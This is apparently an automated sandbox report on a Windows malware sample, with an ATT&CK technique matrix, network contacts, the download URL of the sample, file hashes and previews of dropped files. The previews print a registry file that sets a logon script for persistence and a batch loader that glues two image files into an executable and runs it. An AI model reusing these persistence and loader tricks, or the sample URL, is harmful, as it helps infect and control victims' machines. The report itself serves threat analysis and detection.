          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\20250108.exe VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeQueries volume information: C:\Users\user\Downloads\????\?????\l.dll VolumeInformation
          Source: C:\Users\user\Downloads\????\?????\20250108.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Downloads\????\?????\20250108.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000013.00000002.2458700321.000001ABB57C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2455990458.000001F731F10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001F.00000002.2455552559.000001F731E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2456588504.000001ABB4A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure1
          Replication Through Removable Media
          Windows Management Instrumentation11
          Registry Run Keys / Startup Folder
          1
          Process Injection
          11
          Masquerading
          1
          Input Capture
          11
          Security Software Discovery
          Remote Services1
          Input Capture
          2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          11
          Registry Run Keys / Startup Folder
          11
          Modify Registry
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          11
          Disable or Modify Tools
          Security Account Manager41
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          Extra Window Memory Injection
          41
          Virtualization/Sandbox Evasion
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Process Injection
          LSA Secrets11
          Peripheral Device Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Rundll32
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync23
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Extra Window Memory Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar0%Avira URL Cloudsafe
          SourceDetectionScannerLabelLink
          C:\Users\user\Downloads\?????\20250108.exe0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.ap-northeast-1.amazonaws.com
          3.5.157.163
          truefalse
            unknown
            www.google.com
            216.58.206.68
            truefalse
              high
              bx-9999.bx-msedge.net
              150.171.73.254
              truefalse
                unknown
                ow1.res.office365.com
                unknown
                unknownfalse
                  unknown
                  tom18860.s3.ap-northeast-1.amazonaws.com
                  unknown
                  unknownfalse
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    142.250.185.78
                    unknownUnited States
                    15169GOOGLEUSfalse
                    1.1.1.1
                    unknownAustralia
                    13335CLOUDFLARENETUSfalse
                    216.58.212.142
                    unknownUnited States
                    15169GOOGLEUSfalse
                    74.125.133.84
                    unknownUnited States
                    15169GOOGLEUSfalse
                    216.58.206.35
                    unknownUnited States
                    15169GOOGLEUSfalse
                    216.58.206.68
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    206.238.196.227
                    unknownUnited States
                    174COGENT-174USfalse
                    23.56.254.164
                    unknownUnited States
                    42961GPRS-ASZAINKWfalse
                    142.250.184.227
                    unknownUnited States
                    15169GOOGLEUSfalse
                    3.5.157.163
                    s3-r-w.ap-northeast-1.amazonaws.comUnited States
                    16509AMAZON-02USfalse
                    IP
                    192.168.2.16
                    127.0.0.1
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1585773
                    Start date and time:2025-01-08 08:48:03 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                    Sample URL:https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:31
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • EGA enabled
                    Analysis Mode:stream
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal68.troj.evad.win@31/22@5/111
                    • Exclude process from analysis (whitelisted): svchost.exe
                    • Excluded IPs from analysis (whitelisted): 216.58.206.35, 216.58.212.142, 74.125.133.84
                    • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtEnumerateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: https://tom18860.s3.ap-northeast-1.amazonaws.com/%E6%9F%A5%E8%AF%A2%E6%96%87%E4%BB%B6.rar
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1310720
                    Entropy (8bit):0.8168124560486189
                    Encrypted:false
                    SSDEEP:
                    MD5:4C713426D251F816FB10A9843ABEEA3E
                    SHA1:6985FAAA635EE48F929046F51CA6C352D60ACF6C
                    SHA-256:E19855722ED347D6A3C93C3F77298219E9ABC92F3BC00B7A3BA78D32F6F0C3DC
                    SHA-512:8BF12DB5B8F984517A784483259FD4DE36A6700423CCBFAE883698DC381FD09C9588F3408E2821EFFB443151EB78AFA45F16C23B011E53F4B3A566B328143D8A
                    Malicious:false
                    Reputation:unknown
                    Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                    Process:C:\Windows\System32\svchost.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.08082615193441502
                    Encrypted:false
                    SSDEEP:
                    MD5:2547EB3DB34AC4C49A2FB0BEE7FFD90A
                    SHA1:E9B126CE598B2A94D5F3962F334E027C6BB0036E
                    SHA-256:7B2652D8D73669B15C4C4584B15FCC6D9FA77FC032C25021866001EBF46CA644
                    SHA-512:A9C9EF85179FE485BBAA6704B7E743C6395257E2203A634787123055A3995F7891DB3045D5817E5AB64F85581451D7651739216BE75E6AB30E32F4C082E9F49F
                    Malicious:false
                    Reputation:unknown
                    Preview:@..^.....................................;...{..'0...}... ...{........... ...{... ...{..#.#.. ...{.|...................'0...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Downloads\????\?????\20250108.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):3
                    Entropy (8bit):1.584962500721156
                    Encrypted:false
                    SSDEEP:
                    MD5:1C8C462CFA2D16D7337195BB6FA32E71
                    SHA1:E2FBDEFE0271B315BBA443EE35781C743DFD01E7
                    SHA-256:6A7319487AA2B05AF6B2426B0C3A1F1E57E69D7D032A4DC0D44118C9D42EDA61
                    SHA-512:E11DFDD3A971F6ED86D4D3E19A68E19F8F9F41C473BE2A00487334F0FB395177BA34448C2B4816DA76171D3E36B05CBAC77E3F9C796848A77138B71538C864E7
                    Malicious:false
                    Reputation:unknown
                    Preview:MZ?
                    Process:C:\Users\user\Downloads\????\?????\20250108.exe
                    File Type:Windows Registry text (Win2K or above)
                    Category:dropped
                    Size (bytes):190
                    Entropy (8bit):5.118032222537647
                    Encrypted:false
                    SSDEEP:
                    MD5:1DF74E42115B9CA66796B7E7266A688A
                    SHA1:E605F90249F7EE51BAFE9D63347DDFABA008802D
                    SHA-256:01F8FF102EB4A9C952D97D58998F111086BEEF2A5C9EA9597BDFA1851D2F12C8
                    SHA-512:869D9B8B56CBEF0854FFDCD847DFE4841F2C477D341C0239A493DB827CABA4255A601F9B00E48C42BB6B47FE89DA946A2E5380369BCE56354D51E8B3126B3E10
                    Malicious:true
                    Reputation:unknown
                    Preview:Windows Registry Editor Version 5.00....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."UserInitMprLogonScript"="C:\\Users\\Public\\Documents\\update.bat"
                    Process:C:\Users\user\Downloads\????\?????\20250108.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):58365
                    Entropy (8bit):5.927089418899037
                    Encrypted:false
                    SSDEEP:
                    MD5:928591B0ED5A0CC5D78E814620F1A768
                    SHA1:C765B8D4D053737B92980DAAD545669D0E1D5F70
                    SHA-256:092378413753EF981867BF24AE56826D15E2870A8DC05A025C0B16B5CE013A9F
                    SHA-512:9DFA7A4955EDC5693ABAEAC9DC0D5A234D5C87D4A3C2FCEF9A09A5AD9FE1C2D0BEFB78C42BC6D8B81FF680AED89B1EAE1BC628D7B717C6657D0BCE24B9317099
                    Malicious:false
                    Reputation:unknown
                    Preview:.....................@...............................................!..L.!This program cannot be run in DOS mode....$........[{o.:.<.:.<.:.<.h.<.:.<.h.<.:.<..n<.:.<.:.<.:.<.h.<.:.<.h.<.:.<Rich.:.<................PE..d...{.zg.........."..........j.................@.............................@............@.................................................(...<............ ...............0..........................................................X............................text.............................. ..`.rdata...&.......(..................@..@.data....4..........................@....pdata....... ......................@..@.reloc.......0......................@..B...................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Downloads\????\?????\20250108.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):169472
                    Entropy (8bit):5.209109938757547
                    Encrypted:false
                    SSDEEP:
                    MD5:151531CE14F3D4CB7BE58B912696C681
                    SHA1:69B9CE50576AB667A5861B8CB7C8F440685F67F9
                    SHA-256:3AD8CE4BFFEAFBC3C7CBBE226C2E57DFEC6A6D34D91E605106B33755C7AEF237
                    SHA-512:D0F13759CE69C8199A3499F28449C1F766A827F3AFAAACFA234F86340907E52B65F06814863DCE9C7C9DFE2BFB4EDB61522F6142766905826D34FA62D5018143
                    Malicious:false
                    Reputation:unknown
                    Preview:XOPG.....L]...]..]......................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1..........CS.r.S.r.S.r.<...>.r.<...X.r.<...~.r.Z...X.r.S.s..r.<...^.r.<...R.r.G|v}S.r.........................EP..q....kLp..........7......}..........a..........U....................................}.....U.................................................=...m....e.......E..m.......................................................................-...........................;apma....e.......e..................5..u;gqtat...u.......u..................U..U;qtat....e.......e..................U...;eqtat...5...E...5...E..............U..U;gfgv........e.......e..............U..U;gpyzv..............................U..W........................................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Downloads\????\?????\20250108.exe
                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):190
                    Entropy (8bit):4.894035329095596
                    Encrypted:false
                    SSDEEP:
                    MD5:4B85C6C0CCF6D4A3E91F12B471763BD9
                    SHA1:0E3C79447FF2DA26E52815B07F3347DAFF4983FD
                    SHA-256:5EC5A76ADE15C6214C763A63DDAC8D9E3442535001714207E5A454432AE1328D
                    SHA-512:246455B4865C77EAA58D4E8DF24131800115AD2F18D5F77C70E8353C5922F340CFBD7A88BEA1FF0C85137C32E7D8D217669F8D7A89258941713C829929C2C1C8
                    Malicious:true
                    Reputation:unknown
                    Preview:@echo off..copy /b "C:\Users\Public\Documents\1.jpg" + "C:\Users\Public\Documents\2.jpg" "C:\Users\Public\Documents\SkyOption.exe"..start "" "C:\Users\Public\Documents\SkyOption.exe"..exit..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11887
                    Entropy (8bit):4.901437212034066
                    Encrypted:false
                    SSDEEP:
                    MD5:ED30A738A05A68D6AB27771BD846A7AA
                    SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                    SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                    SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                    Malicious:false
                    Reputation:unknown
                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):60
                    Entropy (8bit):4.038920595031593
                    Encrypted:false
                    SSDEEP:
                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                    Malicious:false
                    Reputation:unknown
                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:Unicode text, UTF-8 text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):85
                    Entropy (8bit):5.122331048887613
                    Encrypted:false
                    SSDEEP:
                    MD5:B40370148B458AD861897AB6E74D66B9
                    SHA1:67C5803668AFCD3C80DCFF9B46408627ACDBDCCE
                    SHA-256:5E73587FEFFE6A18EB66D92360644DEE446B13C92B7997E07AC6E761A3E42FC7
                    SHA-512:360D444B5F1B3CAAD984D945704DEBCAF2F6CCD1206BA244BE1C19525AED5594F7F129B7029388B48EAE5A333178795E06D551DF58576A08508E0021EF1D50FB
                    Malicious:false
                    Reputation:unknown
                    Preview:cd C:\Users\user\Downloads\..cd .\.....\..ls..get-filehash .\20250108.exe..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):0
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:
                    MD5:35E1CC22F0F12DD15CC1FB34999CC2B3
                    SHA1:AF0985022CA8E8460976CB741C3523B71DBFC9CC
                    SHA-256:EBB1797758095C0DA2C50DEC7B6E990C6DFC8046E6A311698F3C573B52B5C4DB
                    SHA-512:BF92F935FFE9A4333D7B0C050536CC36827CB589129B2A2C22FE1B38D40F5EFAD82DB6D5B10308863C1D851FDCA4D051C57A22A9340F3A6A708FBE2450318F2C
                    Malicious:false
                    Reputation:unknown
                    Preview:...................................FL..................F. .. ......{4...Q>D.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...6.O..a....D.a......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H(Z.>..............................A.p.p.D.a.t.a...B.V.1.....(Z.>..Roaming.@......FW.H(Z.>...........................V..R.o.a.m.i.n.g.....\.1.....(Z.>..MICROS~1..D......FW.H(Z.>...........................D.M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.H(Z.>..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H(Z.>....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....(Z.>..Programs..j......FW.H(Z.>....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H(Z.>..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H(Z1>....Q...........
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):5440
                    Entropy (8bit):3.9448691697893254
                    Encrypted:false
                    SSDEEP:
                    MD5:35E1CC22F0F12DD15CC1FB34999CC2B3
                    SHA1:AF0985022CA8E8460976CB741C3523B71DBFC9CC
                    SHA-256:EBB1797758095C0DA2C50DEC7B6E990C6DFC8046E6A311698F3C573B52B5C4DB
                    SHA-512:BF92F935FFE9A4333D7B0C050536CC36827CB589129B2A2C22FE1B38D40F5EFAD82DB6D5B10308863C1D851FDCA4D051C57A22A9340F3A6A708FBE2450318F2C
                    Malicious:false
                    Reputation:unknown
                    Preview:...................................FL..................F. .. ......{4...Q>D.a..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...6.O..a....D.a......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H(Z.>..............................A.p.p.D.a.t.a...B.V.1.....(Z.>..Roaming.@......FW.H(Z.>...........................V..R.o.a.m.i.n.g.....\.1.....(Z.>..MICROS~1..D......FW.H(Z.>...........................D.M.i.c.r.o.s.o.f.t.....V.1.....GX)w..Windows.@......FW.H(Z.>..............................W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H(Z.>....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....(Z.>..Programs..j......FW.H(Z.>....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H(Z.>..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H(Z1>....Q...........
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2673
                    Entropy (8bit):3.988247671586456
                    Encrypted:false
                    SSDEEP:
                    MD5:BE3A83941BEF3A25FB0A08F3A8015D22
                    SHA1:470AC457A648768F8ACFEE4175F352A99D91854B
                    SHA-256:30B7856786CC72480F4E1EF3568DC96D4F8F1B452D69ED499CBE27A103EF5092
                    SHA-512:D7055E1313E55951FC401C6CA793B8A8B8DA8860464094F7A39D5D99E3DDDC7DBC3C46C2CB70CF8671C9E099D1404283D191D36E79C4AB1E78AA0E5C4F74D691
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,....Z....a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2675
                    Entropy (8bit):4.005608023745956
                    Encrypted:false
                    SSDEEP:
                    MD5:9EF668CD03051C11352FE63D6093BA1E
                    SHA1:0D446F9DA600B47C55E55F2E1439C8B3B10882ED
                    SHA-256:9D18279B206CD51C67D6DD039B1C1D7969D51DE715545F3A1CFEC708B912ABC2
                    SHA-512:24BEB0D2313CE34AC56F8092A70EBF59C118E966851A183591D0B579C3D1ACBCE87C1D57B7ED9CC2CF0E4F8CB4E4E0410400DC6D16FB2DDA2F9BA2B440D2A58F
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.....J...a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):4.002788148013199
                    Encrypted:false
                    SSDEEP:
                    MD5:D0E7A39456FD037FEBE5E3DD9B3CC98A
                    SHA1:AC134E8AC01078E42EF17BE614D52DF5B3F4C036
                    SHA-256:DAE786004E171E3D1389308C568405D1FA16F0DC9615F0A1BD6EC729436F0455
                    SHA-512:63CBF933FC45F786A3A81D4D98EE0857241B50660E0AF3557457C2A5A9309C79492ADEDD24B3A0BC00B89AAFC3B9B69A61EB231BA3D98B932A03709EDBE3664A
                    Malicious:false
                    Reputation:unknown
                    Preview:L..................F.@.. ...$+.,.........a..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z.>....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z.>....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z.>....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z.>..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z.>...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 06:48:42 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.993421443684064
                    Encrypted:false
                    SSDEEP:
                    MD5:EA4D03B2F4C15CC488B79F701CE416B8
                    SHA1:E8925F6004559154E09EC8D52563F3DC28DE6541
                    SHA-256:106BE4FFF83B656DCD0A99606BBC2D0FB8E054F3570D41FCCBA8A780E0E4C8EC
                    SHA-512:8C70D8263A0A1CDC0AAB2757001B76F75C3413797246DF119482A4497463C6298E02B6A74526568DB99FDE3A0995F8B4DA4695099EE1CE379C48087EC1CDA943
                    Malicious:false
                    Reputation:unknown
